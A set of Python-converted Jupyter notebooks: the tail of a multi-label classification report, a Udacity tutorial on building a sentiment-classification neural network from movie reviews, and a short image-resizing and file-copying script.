y_pred_subset.append(-1)
y_pred_subset = np.array(y_pred_subset)
onehot_encoder = OneHotEncoder(sparse=False, handle_unknown="ignore")
onehot_encoder.fit(y_test_subset.reshape(-1, 1))
y_pred_subset_ohencoded = onehot_encoder.transform(y_pred_subset.reshape(-1, 1))
y_test_subset_ohencoded = onehot_encoder.transform(y_test_subset.reshape(-1, 1))
#labels = multilabel_df.drop(["image\\label", "in_train", "total_label_count", "subset"], axis=1).columns
print(classification_report(y_test_subset_ohencoded, y_pred_subset_ohencoded))
# #### Multi-Label Results
labels = multilabel_df.drop(["image\\label", "in_train", "total_label_count", "subset"], axis=1).columns
print(classification_report(y_test, y_pred_tresholded, target_names=labels))
# +
fig, ax = plt.subplots(figsize=(15, 8))
for i in range(len(labels)):
fpr, tpr, thresholds = roc_curve(y_test[:, i], y_pred[:, i])
auc = roc_auc_score(y_test[:, i], y_pred[:, i])
ax.plot(fpr, tpr, label=labels[i] + f" (AUC: {auc:.2f})")
plt.xlabel("FPR")
plt.ylabel("TPR")
plt.title("ROC Curve")
plt.legend()
plt.show()
|
Report.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Sentiment Classification & How To "Frame Problems" for a Neural Network
#
# by <NAME>
#
# - **Twitter**: @iamtrask
# - **Blog**: http://iamtrask.github.io
# ### What You Should Already Know
#
# - neural networks, forward and back-propagation
# - stochastic gradient descent
# - mean squared error
# - and train/test splits
#
# ### Where to Get Help if You Need it
# - Re-watch previous Udacity Lectures
# - Leverage the recommended Course Reading Material - [Grokking Deep Learning](https://www.manning.com/books/grokking-deep-learning) (40% Off: **traskud17**)
# - Shoot me a tweet @iamtrask
#
#
# ### Tutorial Outline:
#
# - Intro: The Importance of "Framing a Problem"
#
#
# - Curate a Dataset
# - Developing a "Predictive Theory"
# - **PROJECT 1**: Quick Theory Validation
#
#
# - Transforming Text to Numbers
# - **PROJECT 2**: Creating the Input/Output Data
#
#
# - Putting it all together in a Neural Network
# - **PROJECT 3**: Building our Neural Network
#
#
# - Understanding Neural Noise
# - **PROJECT 4**: Making Learning Faster by Reducing Noise
#
#
# - Analyzing Inefficiencies in our Network
# - **PROJECT 5**: Making our Network Train and Run Faster
#
#
# - Further Noise Reduction
# - **PROJECT 6**: Reducing Noise by Strategically Reducing the Vocabulary
#
#
# - Analysis: What's going on in the weights?
# + [markdown] nbpresent={"id": "56bb3cba-260c-4ebe-9ed6-b995b4c72aa3"}
# # Lesson: Curate a Dataset
# + nbpresent={"id": "eba2b193-0419-431e-8db9-60f34dd3fe83"}
def pretty_print_review_and_label(i):
print(labels[i] + "\t:\t" + reviews[i][:80] + "...")
g = open('reviews.txt','r') # What we know!
reviews = list(map(lambda x:x[:-1],g.readlines()))
g.close()
g = open('labels.txt','r') # What we WANT to know!
labels = list(map(lambda x:x[:-1].upper(),g.readlines()))
g.close()
# -
len(reviews)
# + nbpresent={"id": "bb95574b-21a0-4213-ae50-34363cf4f87f"}
reviews[0]
# + nbpresent={"id": "e0408810-c424-4ed4-afb9-1735e9ddbd0a"}
labels[0]
# -
# # Lesson: Develop a Predictive Theory
# + nbpresent={"id": "e67a709f-234f-4493-bae6-4fb192141ee0"}
print("labels.txt \t : \t reviews.txt\n")
pretty_print_review_and_label(2137)
pretty_print_review_and_label(12816)
pretty_print_review_and_label(6267)
pretty_print_review_and_label(21934)
pretty_print_review_and_label(5297)
pretty_print_review_and_label(4998)
# -
# # Project 1: Quick Theory Validation
from collections import Counter
import numpy as np
positive_counts = Counter()
negative_counts = Counter()
total_counts = Counter()
for i in range(len(reviews)):
if(labels[i] == 'POSITIVE'):
for word in reviews[i].split(" "):
positive_counts[word] += 1
total_counts[word] += 1
else:
for word in reviews[i].split(" "):
negative_counts[word] += 1
total_counts[word] += 1
positive_counts.most_common()
# +
pos_neg_ratios = Counter()
for term,cnt in list(total_counts.most_common()):
if(cnt > 100):
pos_neg_ratio = positive_counts[term] / float(negative_counts[term]+1)
pos_neg_ratios[term] = pos_neg_ratio
for word,ratio in pos_neg_ratios.most_common():
if(ratio > 1):
pos_neg_ratios[word] = np.log(ratio)
else:
pos_neg_ratios[word] = -np.log((1 / (ratio+0.01)))
# -
# words most frequently seen in a review with a "POSITIVE" label
pos_neg_ratios.most_common()
# words most frequently seen in a review with a "NEGATIVE" label
list(reversed(pos_neg_ratios.most_common()))[0:30]
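The log transform above makes positive and negative sentiment roughly symmetric around zero: a word seen about twice as often in positive reviews gets approximately the opposite score of one seen about twice as often in negative reviews. A quick self-contained check with made-up counts (the helper below restates the transform from the cell above, including its `+1` and `+0.01` smoothing):

```python
import numpy as np

def signed_log_ratio(pos, neg):
    # same transform as the cell above: log of the ratio when it
    # exceeds 1, negative log of the smoothed inverse otherwise
    ratio = pos / float(neg + 1)
    if ratio > 1:
        return np.log(ratio)
    return -np.log(1 / (ratio + 0.01))

print(round(signed_log_ratio(200, 99), 2))   # ratio 200/100 = 2.0 -> log(2) ~ 0.69
print(round(signed_log_ratio(100, 199), 2))  # ratio 100/200 = 0.5 -> ~ -0.67
```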
# # Transforming Text into Numbers
# +
from IPython.display import Image
review = "This was a horrible, terrible movie."
Image(filename='sentiment_network.png')
# +
review = "The movie was excellent"
Image(filename='sentiment_network_pos.png')
# -
# # Project 2: Creating the Input/Output Data
vocab = set(total_counts.keys())
vocab_size = len(vocab)
print(vocab_size)
list(vocab)
# +
import numpy as np
layer_0 = np.zeros((1,vocab_size))
layer_0
# -
from IPython.display import Image
Image(filename='sentiment_network.png')
# +
word2index = {}
for i,word in enumerate(vocab):
word2index[word] = i
word2index
# +
def update_input_layer(review):
global layer_0
# clear out previous state, reset the layer to be all 0s
layer_0 *= 0
for word in review.split(" "):
layer_0[0][word2index[word]] += 1
update_input_layer(reviews[0])
# -
layer_0
def get_target_for_label(label):
if(label == 'POSITIVE'):
return 1
else:
return 0
labels[0]
get_target_for_label(labels[0])
labels[1]
get_target_for_label(labels[1])
# # Project 3: Building a Neural Network
# - Start with your neural network from the last chapter
# - 3 layer neural network
# - no non-linearity in hidden layer
# - use our functions to create the training data
# - create a "pre_process_data" function to create vocabulary for our training data generating functions
# - modify "train" to train over the entire corpus
# ### Where to Get Help if You Need it
# - Re-watch previous week's Udacity Lectures
# - Chapters 3-5 - [Grokking Deep Learning](https://www.manning.com/books/grokking-deep-learning) - (40% Off: **traskud17**)
# +
import time
import sys
import numpy as np
# Let's tweak our network from before to model these phenomena
class SentimentNetwork:
def __init__(self, reviews,labels,hidden_nodes = 10, learning_rate = 0.1):
# set our random number generator
np.random.seed(1)
self.pre_process_data(reviews, labels)
self.init_network(len(self.review_vocab),hidden_nodes, 1, learning_rate)
def pre_process_data(self, reviews, labels):
review_vocab = set()
for review in reviews:
for word in review.split(" "):
review_vocab.add(word)
self.review_vocab = list(review_vocab)
label_vocab = set()
for label in labels:
label_vocab.add(label)
self.label_vocab = list(label_vocab)
self.review_vocab_size = len(self.review_vocab)
self.label_vocab_size = len(self.label_vocab)
self.word2index = {}
for i, word in enumerate(self.review_vocab):
self.word2index[word] = i
self.label2index = {}
for i, label in enumerate(self.label_vocab):
self.label2index[label] = i
def init_network(self, input_nodes, hidden_nodes, output_nodes, learning_rate):
# Set number of nodes in input, hidden and output layers.
self.input_nodes = input_nodes
self.hidden_nodes = hidden_nodes
self.output_nodes = output_nodes
# Initialize weights
self.weights_0_1 = np.zeros((self.input_nodes,self.hidden_nodes))
self.weights_1_2 = np.random.normal(0.0, self.output_nodes**-0.5,
(self.hidden_nodes, self.output_nodes))
self.learning_rate = learning_rate
self.layer_0 = np.zeros((1,input_nodes))
def update_input_layer(self,review):
# clear out previous state, reset the layer to be all 0s
self.layer_0 *= 0
for word in review.split(" "):
if(word in self.word2index.keys()):
self.layer_0[0][self.word2index[word]] += 1
def get_target_for_label(self,label):
if(label == 'POSITIVE'):
return 1
else:
return 0
def sigmoid(self,x):
return 1 / (1 + np.exp(-x))
def sigmoid_output_2_derivative(self,output):
return output * (1 - output)
def train(self, training_reviews, training_labels):
assert(len(training_reviews) == len(training_labels))
correct_so_far = 0
start = time.time()
for i in range(len(training_reviews)):
review = training_reviews[i]
label = training_labels[i]
#### Implement the forward pass here ####
### Forward pass ###
# Input Layer
self.update_input_layer(review)
# Hidden layer
layer_1 = self.layer_0.dot(self.weights_0_1)
# Output layer
layer_2 = self.sigmoid(layer_1.dot(self.weights_1_2))
#### Implement the backward pass here ####
### Backward pass ###
# TODO: Output error
layer_2_error = layer_2 - self.get_target_for_label(label) # Output layer error is the difference between desired target and actual output.
layer_2_delta = layer_2_error * self.sigmoid_output_2_derivative(layer_2)
# TODO: Backpropagated error
layer_1_error = layer_2_delta.dot(self.weights_1_2.T) # errors propagated to the hidden layer
layer_1_delta = layer_1_error # hidden layer gradients - no nonlinearity so it's the same as the error
# TODO: Update the weights
self.weights_1_2 -= layer_1.T.dot(layer_2_delta) * self.learning_rate # update hidden-to-output weights with gradient descent step
self.weights_0_1 -= self.layer_0.T.dot(layer_1_delta) * self.learning_rate # update input-to-hidden weights with gradient descent step
if(np.abs(layer_2_error) < 0.5):
correct_so_far += 1
reviews_per_second = i / float(time.time() - start)
sys.stdout.write("\rProgress:" + str(100 * i/float(len(training_reviews)))[:4] + "% Speed(reviews/sec):" + str(reviews_per_second)[0:5] + " #Correct:" + str(correct_so_far) + " #Trained:" + str(i+1) + " Training Accuracy:" + str(correct_so_far * 100 / float(i+1))[:4] + "%")
if(i % 2500 == 0):
print("")
def test(self, testing_reviews, testing_labels):
correct = 0
start = time.time()
for i in range(len(testing_reviews)):
pred = self.run(testing_reviews[i])
if(pred == testing_labels[i]):
correct += 1
reviews_per_second = i / float(time.time() - start)
sys.stdout.write("\rProgress:" + str(100 * i/float(len(testing_reviews)))[:4] \
+ "% Speed(reviews/sec):" + str(reviews_per_second)[0:5] \
+ "% #Correct:" + str(correct) + " #Tested:" + str(i+1) + " Testing Accuracy:" + str(correct * 100 / float(i+1))[:4] + "%")
def run(self, review):
# Input Layer
self.update_input_layer(review.lower())
# Hidden layer
layer_1 = self.layer_0.dot(self.weights_0_1)
# Output layer
layer_2 = self.sigmoid(layer_1.dot(self.weights_1_2))
if(layer_2[0] > 0.5):
return "POSITIVE"
else:
return "NEGATIVE"
# -
mlp = SentimentNetwork(reviews[:-1000],labels[:-1000], learning_rate=0.1)
# evaluate our model before training (just to show how horrible it is)
mlp.test(reviews[-1000:],labels[-1000:])
# train the network
mlp.train(reviews[:-1000],labels[:-1000])
mlp = SentimentNetwork(reviews[:-1000],labels[:-1000], learning_rate=0.01)
# train the network
mlp.train(reviews[:-1000],labels[:-1000])
mlp = SentimentNetwork(reviews[:-1000],labels[:-1000], learning_rate=0.001)
# train the network
mlp.train(reviews[:-1000],labels[:-1000])
# # Understanding Neural Noise
from IPython.display import Image
Image(filename='sentiment_network.png')
# +
def update_input_layer(review):
global layer_0
# clear out previous state, reset the layer to be all 0s
layer_0 *= 0
for word in review.split(" "):
layer_0[0][word2index[word]] += 1
update_input_layer(reviews[0])
# -
layer_0
review_counter = Counter()
for word in reviews[0].split(" "):
review_counter[word] += 1
review_counter.most_common()
# # Project 4: Reducing Noise in our Input Data
# +
import time
import sys
import numpy as np
# Let's tweak our network from before to model these phenomena
class SentimentNetwork:
def __init__(self, reviews,labels,hidden_nodes = 10, learning_rate = 0.1):
# set our random number generator
np.random.seed(1)
self.pre_process_data(reviews, labels)
self.init_network(len(self.review_vocab),hidden_nodes, 1, learning_rate)
def pre_process_data(self, reviews, labels):
review_vocab = set()
for review in reviews:
for word in review.split(" "):
review_vocab.add(word)
self.review_vocab = list(review_vocab)
label_vocab = set()
for label in labels:
label_vocab.add(label)
self.label_vocab = list(label_vocab)
self.review_vocab_size = len(self.review_vocab)
self.label_vocab_size = len(self.label_vocab)
self.word2index = {}
for i, word in enumerate(self.review_vocab):
self.word2index[word] = i
self.label2index = {}
for i, label in enumerate(self.label_vocab):
self.label2index[label] = i
def init_network(self, input_nodes, hidden_nodes, output_nodes, learning_rate):
# Set number of nodes in input, hidden and output layers.
self.input_nodes = input_nodes
self.hidden_nodes = hidden_nodes
self.output_nodes = output_nodes
# Initialize weights
self.weights_0_1 = np.zeros((self.input_nodes,self.hidden_nodes))
self.weights_1_2 = np.random.normal(0.0, self.output_nodes**-0.5,
(self.hidden_nodes, self.output_nodes))
self.learning_rate = learning_rate
self.layer_0 = np.zeros((1,input_nodes))
def update_input_layer(self,review):
# clear out previous state, reset the layer to be all 0s
self.layer_0 *= 0
for word in review.split(" "):
if(word in self.word2index.keys()):
self.layer_0[0][self.word2index[word]] = 1
def get_target_for_label(self,label):
if(label == 'POSITIVE'):
return 1
else:
return 0
def sigmoid(self,x):
return 1 / (1 + np.exp(-x))
def sigmoid_output_2_derivative(self,output):
return output * (1 - output)
def train(self, training_reviews, training_labels):
assert(len(training_reviews) == len(training_labels))
correct_so_far = 0
start = time.time()
for i in range(len(training_reviews)):
review = training_reviews[i]
label = training_labels[i]
#### Implement the forward pass here ####
### Forward pass ###
# Input Layer
self.update_input_layer(review)
# Hidden layer
layer_1 = self.layer_0.dot(self.weights_0_1)
# Output layer
layer_2 = self.sigmoid(layer_1.dot(self.weights_1_2))
#### Implement the backward pass here ####
### Backward pass ###
# TODO: Output error
layer_2_error = layer_2 - self.get_target_for_label(label) # Output layer error is the difference between desired target and actual output.
layer_2_delta = layer_2_error * self.sigmoid_output_2_derivative(layer_2)
# TODO: Backpropagated error
layer_1_error = layer_2_delta.dot(self.weights_1_2.T) # errors propagated to the hidden layer
layer_1_delta = layer_1_error # hidden layer gradients - no nonlinearity so it's the same as the error
# TODO: Update the weights
self.weights_1_2 -= layer_1.T.dot(layer_2_delta) * self.learning_rate # update hidden-to-output weights with gradient descent step
self.weights_0_1 -= self.layer_0.T.dot(layer_1_delta) * self.learning_rate # update input-to-hidden weights with gradient descent step
if(np.abs(layer_2_error) < 0.5):
correct_so_far += 1
reviews_per_second = i / float(time.time() - start)
sys.stdout.write("\rProgress:" + str(100 * i/float(len(training_reviews)))[:4] + "% Speed(reviews/sec):" + str(reviews_per_second)[0:5] + " #Correct:" + str(correct_so_far) + " #Trained:" + str(i+1) + " Training Accuracy:" + str(correct_so_far * 100 / float(i+1))[:4] + "%")
if(i % 2500 == 0):
print("")
def test(self, testing_reviews, testing_labels):
correct = 0
start = time.time()
for i in range(len(testing_reviews)):
pred = self.run(testing_reviews[i])
if(pred == testing_labels[i]):
correct += 1
reviews_per_second = i / float(time.time() - start)
sys.stdout.write("\rProgress:" + str(100 * i/float(len(testing_reviews)))[:4] \
+ "% Speed(reviews/sec):" + str(reviews_per_second)[0:5] \
+ "% #Correct:" + str(correct) + " #Tested:" + str(i+1) + " Testing Accuracy:" + str(correct * 100 / float(i+1))[:4] + "%")
def run(self, review):
# Input Layer
self.update_input_layer(review.lower())
# Hidden layer
layer_1 = self.layer_0.dot(self.weights_0_1)
# Output layer
layer_2 = self.sigmoid(layer_1.dot(self.weights_1_2))
if(layer_2[0] > 0.5):
return "POSITIVE"
else:
return "NEGATIVE"
# -
mlp = SentimentNetwork(reviews[:-1000],labels[:-1000], learning_rate=0.1)
mlp.train(reviews[:-1000],labels[:-1000])
# evaluate our model after training
mlp.test(reviews[-1000:],labels[-1000:])
# # Analyzing Inefficiencies in our Network
Image(filename='sentiment_network_sparse.png')
layer_0 = np.zeros(10)
layer_0
layer_0[4] = 1
layer_0[9] = 1
layer_0
weights_0_1 = np.random.randn(10,5)
layer_0.dot(weights_0_1)
indices = [4,9]
layer_1 = np.zeros(5)
for index in indices:
layer_1 += (weights_0_1[index])
layer_1
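The two cells above should agree: summing the weight rows at the active indices is exactly the dot product of a sparse one-hot input with the weight matrix. A self-contained check of that equivalence (same shapes as above, with a fixed seed added so the comparison is reproducible):

```python
import numpy as np

np.random.seed(1)
weights_0_1 = np.random.randn(10, 5)

# dense path: multiply the full one-hot input layer by the weights
layer_0 = np.zeros(10)
layer_0[4] = 1
layer_0[9] = 1
dense = layer_0.dot(weights_0_1)

# sparse path: just add up the weight rows for the active indices
sparse = np.zeros(5)
for index in [4, 9]:
    sparse += weights_0_1[index]

print(np.allclose(dense, sparse))  # -> True
```

This is the efficiency win exploited in Project 5: the sparse path touches only as many rows as there are words in the review, instead of the full vocabulary-sized matrix multiply.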
Image(filename='sentiment_network_sparse_2.png')
# # Project 5: Making our Network More Efficient
# +
import time
import sys
# Let's tweak our network from before to model these phenomena
class SentimentNetwork:
def __init__(self, reviews,labels,hidden_nodes = 10, learning_rate = 0.1):
np.random.seed(1)
self.pre_process_data(reviews, labels)
self.init_network(len(self.review_vocab),hidden_nodes, 1, learning_rate)
def pre_process_data(self, reviews, labels):
review_vocab = set()
for review in reviews:
for word in review.split(" "):
review_vocab.add(word)
self.review_vocab = list(review_vocab)
label_vocab = set()
for label in labels:
label_vocab.add(label)
self.label_vocab = list(label_vocab)
self.review_vocab_size = len(self.review_vocab)
self.label_vocab_size = len(self.label_vocab)
self.word2index = {}
for i, word in enumerate(self.review_vocab):
self.word2index[word] = i
self.label2index = {}
for i, label in enumerate(self.label_vocab):
self.label2index[label] = i
def init_network(self, input_nodes, hidden_nodes, output_nodes, learning_rate):
# Set number of nodes in input, hidden and output layers.
self.input_nodes = input_nodes
self.hidden_nodes = hidden_nodes
self.output_nodes = output_nodes
# Initialize weights
self.weights_0_1 = np.zeros((self.input_nodes,self.hidden_nodes))
self.weights_1_2 = np.random.normal(0.0, self.output_nodes**-0.5,
(self.hidden_nodes, self.output_nodes))
self.learning_rate = learning_rate
self.layer_0 = np.zeros((1,input_nodes))
self.layer_1 = np.zeros((1,hidden_nodes))
def sigmoid(self,x):
return 1 / (1 + np.exp(-x))
def sigmoid_output_2_derivative(self,output):
return output * (1 - output)
def update_input_layer(self,review):
# clear out previous state, reset the layer to be all 0s
self.layer_0 *= 0
for word in review.split(" "):
self.layer_0[0][self.word2index[word]] = 1
def get_target_for_label(self,label):
if(label == 'POSITIVE'):
return 1
else:
return 0
def train(self, training_reviews_raw, training_labels):
training_reviews = list()
for review in training_reviews_raw:
indices = set()
for word in review.split(" "):
if(word in self.word2index.keys()):
indices.add(self.word2index[word])
training_reviews.append(list(indices))
assert(len(training_reviews) == len(training_labels))
correct_so_far = 0
start = time.time()
for i in range(len(training_reviews)):
review = training_reviews[i]
label = training_labels[i]
#### Implement the forward pass here ####
### Forward pass ###
# Input Layer
# Hidden layer
# layer_1 = self.layer_0.dot(self.weights_0_1)
self.layer_1 *= 0
for index in review:
self.layer_1 += self.weights_0_1[index]
# Output layer
layer_2 = self.sigmoid(self.layer_1.dot(self.weights_1_2))
#### Implement the backward pass here ####
### Backward pass ###
# Output error
layer_2_error = layer_2 - self.get_target_for_label(label) # Output layer error is the difference between desired target and actual output.
layer_2_delta = layer_2_error * self.sigmoid_output_2_derivative(layer_2)
# Backpropagated error
layer_1_error = layer_2_delta.dot(self.weights_1_2.T) # errors propagated to the hidden layer
layer_1_delta = layer_1_error # hidden layer gradients - no nonlinearity so it's the same as the error
# Update the weights
self.weights_1_2 -= self.layer_1.T.dot(layer_2_delta) * self.learning_rate # update hidden-to-output weights with gradient descent step
for index in review:
self.weights_0_1[index] -= layer_1_delta[0] * self.learning_rate # update input-to-hidden weights with gradient descent step
if(np.abs(layer_2_error) < 0.5):
correct_so_far += 1
reviews_per_second = i / float(time.time() - start)
sys.stdout.write("\rProgress:" + str(100 * i/float(len(training_reviews)))[:4] + "% Speed(reviews/sec):" + str(reviews_per_second)[0:5] + " #Correct:" + str(correct_so_far) + " #Trained:" + str(i+1) + " Training Accuracy:" + str(correct_so_far * 100 / float(i+1))[:4] + "%")
def test(self, testing_reviews, testing_labels):
correct = 0
start = time.time()
for i in range(len(testing_reviews)):
pred = self.run(testing_reviews[i])
if(pred == testing_labels[i]):
correct += 1
reviews_per_second = i / float(time.time() - start)
sys.stdout.write("\rProgress:" + str(100 * i/float(len(testing_reviews)))[:4] \
+ "% Speed(reviews/sec):" + str(reviews_per_second)[0:5] \
+ "% #Correct:" + str(correct) + " #Tested:" + str(i+1) + " Testing Accuracy:" + str(correct * 100 / float(i+1))[:4] + "%")
def run(self, review):
# Input Layer
# Hidden layer
self.layer_1 *= 0
unique_indices = set()
for word in review.lower().split(" "):
if word in self.word2index.keys():
unique_indices.add(self.word2index[word])
for index in unique_indices:
self.layer_1 += self.weights_0_1[index]
# Output layer
layer_2 = self.sigmoid(self.layer_1.dot(self.weights_1_2))
if(layer_2[0] > 0.5):
return "POSITIVE"
else:
return "NEGATIVE"
# -
mlp = SentimentNetwork(reviews[:-1000],labels[:-1000], learning_rate=0.1)
mlp.train(reviews[:-1000],labels[:-1000])
# evaluate the trained model on the held-out reviews
mlp.test(reviews[-1000:],labels[-1000:])
# # Further Noise Reduction
Image(filename='sentiment_network_sparse_2.png')
# words most frequently seen in a review with a "POSITIVE" label
pos_neg_ratios.most_common()
# words most frequently seen in a review with a "NEGATIVE" label
list(reversed(pos_neg_ratios.most_common()))[0:30]
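These ratios come from comparing each word's counts in positive vs. negative reviews and log-transforming, the same scheme used in `pre_process_data` further below. A toy sketch with invented counts (not taken from the real review corpus):

```python
import numpy as np

# Hypothetical word counts, purely for illustration.
positive_counts = {"great": 90, "bad": 5, "movie": 50}
negative_counts = {"great": 10, "bad": 80, "movie": 55}

pos_neg_ratios = {}
for word in positive_counts:
    ratio = positive_counts[word] / float(negative_counts[word] + 1)
    # The log transform centers neutral words near 0, with positive words
    # above 0 and negative words below 0.
    pos_neg_ratios[word] = np.log(ratio) if ratio > 1 else -np.log(1 / (ratio + 0.01))

print(sorted(pos_neg_ratios, key=pos_neg_ratios.get, reverse=True))
# ['great', 'movie', 'bad']
```

Words near 0 carry little sentiment signal, which is what the `polarity_cutoff` parameter later filters on.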
from bokeh.models import ColumnDataSource, LabelSet
from bokeh.plotting import figure, show, output_file
from bokeh.io import output_notebook
output_notebook()
# +
hist, edges = np.histogram(list(map(lambda x:x[1],pos_neg_ratios.most_common())), density=True, bins=100)
p = figure(tools="pan,wheel_zoom,reset,save",
toolbar_location="above",
title="Word Positive/Negative Affinity Distribution")
p.quad(top=hist, bottom=0, left=edges[:-1], right=edges[1:], line_color="#555555")
show(p)
# +
frequency_frequency = Counter()
for word, cnt in total_counts.most_common():
frequency_frequency[cnt] += 1
# +
hist, edges = np.histogram(list(map(lambda x:x[1],frequency_frequency.most_common())), density=True, bins=100)
p = figure(tools="pan,wheel_zoom,reset,save",
toolbar_location="above",
title="The frequency distribution of the words in our corpus")
p.quad(top=hist, bottom=0, left=edges[:-1], right=edges[1:], line_color="#555555")
show(p)
# -
# # Reducing Noise by Strategically Reducing the Vocabulary
# +
import time
import sys
import numpy as np
# Let's tweak our network from before to model these phenomena
class SentimentNetwork:
def __init__(self, reviews,labels,min_count = 10,polarity_cutoff = 0.1,hidden_nodes = 10, learning_rate = 0.1):
np.random.seed(1)
self.pre_process_data(reviews, labels, polarity_cutoff, min_count)
self.init_network(len(self.review_vocab),hidden_nodes, 1, learning_rate)
def pre_process_data(self, reviews, labels, polarity_cutoff, min_count):
positive_counts = Counter()
negative_counts = Counter()
total_counts = Counter()
for i in range(len(reviews)):
if(labels[i] == 'POSITIVE'):
for word in reviews[i].split(" "):
positive_counts[word] += 1
total_counts[word] += 1
else:
for word in reviews[i].split(" "):
negative_counts[word] += 1
total_counts[word] += 1
pos_neg_ratios = Counter()
for term,cnt in list(total_counts.most_common()):
if(cnt >= 50):
pos_neg_ratio = positive_counts[term] / float(negative_counts[term]+1)
pos_neg_ratios[term] = pos_neg_ratio
for word,ratio in pos_neg_ratios.most_common():
if(ratio > 1):
pos_neg_ratios[word] = np.log(ratio)
else:
pos_neg_ratios[word] = -np.log((1 / (ratio + 0.01)))
review_vocab = set()
for review in reviews:
for word in review.split(" "):
if(total_counts[word] > min_count):
if(word in pos_neg_ratios.keys()):
if((pos_neg_ratios[word] >= polarity_cutoff) or (pos_neg_ratios[word] <= -polarity_cutoff)):
review_vocab.add(word)
else:
review_vocab.add(word)
self.review_vocab = list(review_vocab)
label_vocab = set()
for label in labels:
label_vocab.add(label)
self.label_vocab = list(label_vocab)
self.review_vocab_size = len(self.review_vocab)
self.label_vocab_size = len(self.label_vocab)
self.word2index = {}
for i, word in enumerate(self.review_vocab):
self.word2index[word] = i
self.label2index = {}
for i, label in enumerate(self.label_vocab):
self.label2index[label] = i
def init_network(self, input_nodes, hidden_nodes, output_nodes, learning_rate):
# Set number of nodes in input, hidden and output layers.
self.input_nodes = input_nodes
self.hidden_nodes = hidden_nodes
self.output_nodes = output_nodes
# Initialize weights
self.weights_0_1 = np.zeros((self.input_nodes,self.hidden_nodes))
self.weights_1_2 = np.random.normal(0.0, self.output_nodes**-0.5,
(self.hidden_nodes, self.output_nodes))
self.learning_rate = learning_rate
self.layer_0 = np.zeros((1,input_nodes))
self.layer_1 = np.zeros((1,hidden_nodes))
def sigmoid(self,x):
return 1 / (1 + np.exp(-x))
def sigmoid_output_2_derivative(self,output):
return output * (1 - output)
def update_input_layer(self,review):
# clear out previous state, reset the layer to be all 0s
self.layer_0 *= 0
for word in review.split(" "):
self.layer_0[0][self.word2index[word]] = 1
def get_target_for_label(self,label):
if(label == 'POSITIVE'):
return 1
else:
return 0
def train(self, training_reviews_raw, training_labels):
training_reviews = list()
for review in training_reviews_raw:
indices = set()
for word in review.split(" "):
if(word in self.word2index.keys()):
indices.add(self.word2index[word])
training_reviews.append(list(indices))
assert(len(training_reviews) == len(training_labels))
correct_so_far = 0
start = time.time()
for i in range(len(training_reviews)):
review = training_reviews[i]
label = training_labels[i]
#### Implement the forward pass here ####
### Forward pass ###
# Input Layer
# Hidden layer
# layer_1 = self.layer_0.dot(self.weights_0_1)
self.layer_1 *= 0
for index in review:
self.layer_1 += self.weights_0_1[index]
# Output layer
layer_2 = self.sigmoid(self.layer_1.dot(self.weights_1_2))
#### Implement the backward pass here ####
### Backward pass ###
# Output error
layer_2_error = layer_2 - self.get_target_for_label(label) # Output layer error is the difference between desired target and actual output.
layer_2_delta = layer_2_error * self.sigmoid_output_2_derivative(layer_2)
# Backpropagated error
layer_1_error = layer_2_delta.dot(self.weights_1_2.T) # errors propagated to the hidden layer
layer_1_delta = layer_1_error # hidden layer gradients - no nonlinearity so it's the same as the error
# Update the weights
self.weights_1_2 -= self.layer_1.T.dot(layer_2_delta) * self.learning_rate # update hidden-to-output weights with gradient descent step
for index in review:
self.weights_0_1[index] -= layer_1_delta[0] * self.learning_rate # update input-to-hidden weights with gradient descent step
if(layer_2 >= 0.5 and label == 'POSITIVE'):
correct_so_far += 1
if(layer_2 < 0.5 and label == 'NEGATIVE'):
correct_so_far += 1
reviews_per_second = i / float(time.time() - start)
sys.stdout.write("\rProgress:" + str(100 * i/float(len(training_reviews)))[:4] + "% Speed(reviews/sec):" + str(reviews_per_second)[0:5] + " #Correct:" + str(correct_so_far) + " #Trained:" + str(i+1) + " Training Accuracy:" + str(correct_so_far * 100 / float(i+1))[:4] + "%")
def test(self, testing_reviews, testing_labels):
correct = 0
start = time.time()
for i in range(len(testing_reviews)):
pred = self.run(testing_reviews[i])
if(pred == testing_labels[i]):
correct += 1
reviews_per_second = i / float(time.time() - start)
sys.stdout.write("\rProgress:" + str(100 * i/float(len(testing_reviews)))[:4] \
+ "% Speed(reviews/sec):" + str(reviews_per_second)[0:5] \
+ "% #Correct:" + str(correct) + " #Tested:" + str(i+1) + " Testing Accuracy:" + str(correct * 100 / float(i+1))[:4] + "%")
def run(self, review):
# Input Layer
# Hidden layer
self.layer_1 *= 0
unique_indices = set()
for word in review.lower().split(" "):
if word in self.word2index.keys():
unique_indices.add(self.word2index[word])
for index in unique_indices:
self.layer_1 += self.weights_0_1[index]
# Output layer
layer_2 = self.sigmoid(self.layer_1.dot(self.weights_1_2))
if(layer_2[0] >= 0.5):
return "POSITIVE"
else:
return "NEGATIVE"
# -
mlp = SentimentNetwork(reviews[:-1000],labels[:-1000],min_count=20,polarity_cutoff=0.05,learning_rate=0.01)
mlp.train(reviews[:-1000],labels[:-1000])
mlp.test(reviews[-1000:],labels[-1000:])
mlp = SentimentNetwork(reviews[:-1000],labels[:-1000],min_count=20,polarity_cutoff=0.8,learning_rate=0.01)
mlp.train(reviews[:-1000],labels[:-1000])
mlp.test(reviews[-1000:],labels[-1000:])
# w3/sentiment_network/mini_proj_6.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: hackerton
# language: python
# name: hackerton
# ---
pwd
pass_dir = '/home/ssac26/Downloads/wego/ai_test2'
copy_dir = '/home/ssac26/Downloads/wego/ai_test2_1'
# +
import os
import shutil
import cv2
import matplotlib.pyplot as plt
if __name__ == "__main__":
#root_dir = "/home/ssac26/Downloads/wego/[folder]"
for (root, dirs, files) in os.walk(pass_dir):
print("# root : " + root)
if len(dirs) > 0:
for dir_name in dirs:
print("dir: " + dir_name)
if len(files) > 0:
for file_name in files:
if file_name.endswith('.jpg'):
src_path = os.path.join(root, file_name)
pic = cv2.imread(src_path)
height, width = pic.shape[:2]
pic2 = cv2.resize(pic, None, fx=0.3, fy=0.3, interpolation=cv2.INTER_AREA)
cv2.imwrite(os.path.join(copy_dir, file_name), pic2)
elif file_name.endswith('.xml'):
continue
else:
shutil.copy(os.path.join(root ,file_name), copy_dir)
print("file: " + file_name)
# +
# Function that reads every file in a folder
def read_all_file(path):
file_list = []
output = os.listdir(path)
for i in output:
file_list.append(path+'/'+i)
return file_list
# -
filecounts = read_all_file(copy_dir)
txtcount = 0
